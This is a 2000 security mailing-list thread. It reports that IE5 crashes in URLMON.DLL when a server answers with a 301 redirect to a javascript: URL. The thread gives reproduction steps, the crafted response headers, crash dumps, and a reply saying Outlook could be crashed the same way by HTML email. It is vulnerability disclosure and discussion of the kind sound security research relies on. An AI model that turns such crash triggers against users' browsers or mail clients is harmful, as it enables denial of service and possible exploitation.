Re: IE5 crash

[Mulder <Morpho () FBIAGENCY ORG>]

I have the same problem with outlook in windows ME.
I never tried reproducing it but its very obvious since outlook uses IE so
you could crash outlook by sending a HTML email with what you said in your
email.

Morpho

----- Original Message -----
From: "Dzzie Z" <dzzie () YAHOO COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Saturday, December 23, 2000 12:49 PM
Subject: IE5 crash


> Hi stumbled across this crash for IE..I am on 5.00.2614.3500 in Win98SE it
> seems pretty reproducable with an illegal op in URLMON.dll
>
> 1) create a web page (local is fine) and put in an image to one of your
> servers..this crash dosent even need an image extension on it...just aim
it
> at a directory or script (works same when URL is requesting image as well)
>
> 2) have the server return  the 301 found code with a location of
> 'javascript:<some js command>' = instant crash of IE...
>
> when I first started playign with this it was crashing explorer, I cant
> reproduce the explorer crash anymore...btu I have also updated my
scripting
> engines and added j++
>
> here are the exact headers sent back and forth to the server on the
request
> and the crash log...
>
> just to clarify...the 'server: unix' thing is BS i put in when making the
> server
>
>
> [ Browser Request for http://127.0.0.1/ ]
> GET / HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
> Host: 127.0.0.1
> Connection: Keep-Alive
>
>
> [ Server Response Headers ]
> HTTP/1.1 301 Moved Permanently
> Server: Apache/1.3.11 (Unix)
> Pragma: no-cache
> Accept-Ranges: bytes
> Content-Length: 62
> Connection: Close
> Content-Type: text/html
> Location: javascript:with(navigator){n='\n';alert(userAgent+n+platform)}
>
>
> IEXPLORE caused an invalid page fault in
> module URLMON.DLL at 0187:77037fb8.
> Registers:
> EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010206
> EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
> ECX=77034258 DS=018f ESI=00434048 FS=4c77
> EDX=81706d60 ES=018f EDI=00000001 GS=0000
> Bytes at CS:EIP:
> 8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
> Stack dump:
> 00000000 00000001 00433ec0 77037d5e 00434048 00000000 00000000 7af2a370
> 01149a60 00000000 017beb60 7ad906c0 00000001 00000000 01149b48 01149a60
>
>
> ==============================================
>
> [ Browser Req for 127.0.0.1/image.gif ]
> GET /image.gif HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
> Host: 127.0.0.1
> Connection: Keep-Alive
>
>
> [ Server Response Headers ]
> HTTP/1.1 301 Moved Permanently
> Server: Apache/1.3.11 (Unix)
> Pragma: no-cache
> Accept-Ranges: bytes
> Content-Length: 86
> Connection: Close
> Content-Type: text/html
> Location: javascript:document.write('IE is so BUGGY'+' of course we are
> kind of abusing it too')
>
>
> IEXPLORE caused an invalid page fault in
> module URLMON.DLL at 0187:77037fb8.
> Registers:
> EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010202
> EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
> ECX=77034258 DS=018f ESI=0043407c FS=4c1f
> EDX=8171e8c4 ES=018f EDI=00000001 GS=0000
> Bytes at CS:EIP:
> 8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
> Stack dump:
> 00000000 00000001 00433ef4 77037d5e 0043407c 00000000 00000000 7af2a370
> 01149cd0 00000000 017beb60 7ad906c0 00000001 00000000 01149db8 01149cd0
>
>
> the question is...
>
> can anything more intresting be done with this crash?
> can anyone else reproduce?